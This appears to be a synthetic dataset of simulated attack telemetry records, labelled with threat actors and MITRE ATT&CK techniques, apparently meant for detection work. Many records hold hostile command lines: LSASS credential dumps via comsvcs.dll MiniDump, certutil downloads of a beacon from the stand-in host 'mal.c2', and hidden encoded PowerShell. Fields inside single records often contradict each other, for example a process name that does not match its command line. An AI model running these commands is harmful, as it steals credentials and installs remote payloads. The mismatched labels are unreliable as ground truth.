Stable)","variation_seed":"17895APT29T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.61.137.233","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2550 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-08T18:01:23.000Z","user":{"name":"svc_lwj1a3mxuh9o","sid":"S-1-5-21-484590176-288754909-8847"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt29_20250720T161120000Z_0017897","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.51.102.17","name":"DB-ORACLE-ARH2U9BE8L","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17897APT29T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.63.33.138","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2232 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-01T06:53:34.000Z","user":{"name":"arn:aws:iam::pepzshzhcg0w","sid":"S-1-5-21-684838147-422557322-5715"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260921T182109000Z_0017899","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.47.157.43","name":"EC2-INST-O684DW9CQ9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17899Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.14.214.9","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-24T12:26:58.000Z","user":{"name":"azuread\\835xeamkz7kj","sid":"S-1-5-21-605377515-340740319-1100"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20250406T132818000Z_0017901","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.123.110.242","name":"DB-ORACLE-S1R3IRP2L1","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17901APT29T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.37.117.206","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-17T13:34:33.000Z","user":{"name":"i-7m08bzffxuk4","sid":"S-1-5-21-840371091-538189129-2973"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt41_20260706T065816000Z_0017903","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.24.166.57","name":"EC2-INST-E5MLGG6E1F","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17903APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.193.93.47","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-31T18:05:42.000Z","user":{"name":"svc_l6iwvl6f1jz2","sid":"S-1-5-21-392303039-702611894-1479"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Defense Evasion","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20261117T164140000Z_0017905","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.74.109.5","name":"EC2-INST-TF7M97C4TC","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17905APT29T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.157.223.124","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2603 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-23T04:10:04.000Z","user":{"name":"i-3sqadzsxgp3v","sid":"S-1-5-21-517375408-662059499-2077"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration","Credential Access"],"technique_id":"T1531"},"event_id":"evt_lapsus_20251221T052201000Z_0017907","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.238.24.56","name":"DB-ORACLE-7KB6KMKBWJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17907Lapsus$T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.40.91.179","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1137 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-18T11:44:37.000Z","user":{"name":"i-7ocu6nogi7j6","sid":"S-1-5-21-573111399-460212852-1818"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20260414T211518000Z_0017909","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.65.173.221","name":"IAM-ROLE-KVDR8FEUXI","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17909APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.62.240.219","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3499 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-09-13T09:52:17.000Z","user":{"name":"svc_x90ai5uiv8ux","sid":"S-1-5-21-870866412-785419962-8870"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Persistence","Collection"],"technique_id":"T1531"},"event_id":"evt_fin7_20261114T100902000Z_0017911","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.100.76.177","name":"EC2-INST-OVY86NMLCH","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17911FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.160.32.12","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-06T06:37:11.000Z","user":{"name":"azuread\\qtwyiduugfc6","sid":"S-1-5-21-405064078-152527836-6247"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Defense Evasion"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20261211T040749000Z_0017913","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.82.160.175","name":"AZURE-VM-M9SA4Z3AB6","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17913Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.99.240.224","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-06T13:52:11.000Z","user":{"name":"CORP\\y34ycdoa2jf9","sid":"S-1-5-21-265081145-576354042-1206"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260902T122548000Z_0017915","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.143.190.243","name":"AZURE-VM-5NE4B90WBY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17915Volt TyphoonT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.43.17.222","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-07-29T13:43:43.000Z","user":{"name":"i-vnego9gzkotx","sid":"S-1-5-21-925755132-173335699-2735"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_fin7_20260409T212757000Z_0017917","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.58.44.167","name":"IAM-ROLE-98O1C9081U","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17917FIN7T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.28.164.254","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3287 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-10T18:50:34.000Z","user":{"name":"CORP\\v70rwudgd67l","sid":"S-1-5-21-429221885-822754325-6692"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Collection","Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20251004T000629000Z_0017919","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.158.18.167","name":"IAM-ROLE-941AJLUDVI","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17919Volt TyphoonT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.65.62.89","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-10T22:10:50.000Z","user":{"name":"azuread\\vsj68zc34mrd","sid":"S-1-5-21-801831296-174979910-9715"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Command and Control"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250922T061011000Z_0017921","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.137.206.248","name":"DB-ORACLE-5Z0ZACDRVR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17921Volt TyphoonT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.62.133.133","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-04-11T05:53:20.000Z","user":{"name":"azuread\\acmie703s1f5","sid":"S-1-5-21-365604154-460654769-9746"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Command and Control","Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20260119T221948000Z_0017923","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.35.197.14","name":"DB-ORACLE-1CHAW6W3XM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17923Volt TyphoonT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.120.155.93","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-27T16:30:42.000Z","user":{"name":"svc_4w7blxkz1ef3","sid":"S-1-5-21-466241865-211700836-1988"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration","Reconnaissance","Credential Access"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20250621T154212000Z_0017925","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.229.255.83","name":"EC2-INST-V2O8KAHNY2","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17925Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.132.42.245","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-03-09T16:46:28.000Z","user":{"name":"i-510o42zb9twa","sid":"S-1-5-21-428625661-201421684-2591"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250322T034443000Z_0017927","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.66.137.166","name":"AZURE-VM-ZDD4IQIJI4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17927Mustang PandaT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.117.38.81","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-14T15:30:20.000Z","user":{"name":"i-vw2cnfpslleq","sid":"S-1-5-21-256053188-277236910-8383"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250427T061402000Z_0017929","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.12.52.199","name":"WIN-FIN-SRV-CJIBI3OEN4","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17929APT41T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.122.55.68","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1461 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-19T23:58:33.000Z","user":{"name":"CORP\\syc3yt12k01y","sid":"S-1-5-21-716634802-197421777-6817"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Persistence","Discovery","Collection"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20250218T052440000Z_0017931","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.63.55.208","name":"EC2-INST-CHL5T06MRB","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17931Volt TyphoonT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.98.129.183","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-23T22:43:44.000Z","user":{"name":"azuread\\xoea0od6doug","sid":"S-1-5-21-542728192-427141972-7183"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_apt29_20260216T002847000Z_0017933","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.179.68.138","name":"EC2-INST-5NCB8L3V87","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17933APT29T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.32.80.37","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-11-07T21:26:42.000Z","user":{"name":"i-ln25ot4j8ao9","sid":"S-1-5-21-810816263-258837041-4712"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Execution"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20250830T052454000Z_0017935","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.120.169.158","name":"IAM-ROLE-WA9O18FPPZ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17935Lapsus$T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.52.153.166","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-11-11T04:43:41.000Z","user":{"name":"svc_2a7uxehtonm1","sid":"S-1-5-21-217370841-421764140-6388"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260409T044804000Z_0017937","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.180.234.212","name":"EC2-INST-59UT1UXR30","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17937Scattered SpiderT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.3.155.232","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1647 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-19T20:46:07.000Z","user":{"name":"arn:aws:iam::jueqn3q4qjci","sid":"S-1-5-21-834157728-650904132-6879"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Persistence","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260902T221413000Z_0017939","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.85.4.40","name":"WIN-FIN-SRV-IIF68UU4CI","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17939APT29T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.79.152.174","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-24T09:20:00.000Z","user":{"name":"svc_39rtkra725xw","sid":"S-1-5-21-151654458-322970759-2924"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250626T082830000Z_0017941","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.104.59.140","name":"EC2-INST-J04Y3P9JW0","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17941FIN7T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.146.194.41","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2026-12-24T08:16:10.000Z","user":{"name":"arn:aws:iam::slaeycfh9x73","sid":"S-1-5-21-194123404-484349442-2331"}} |
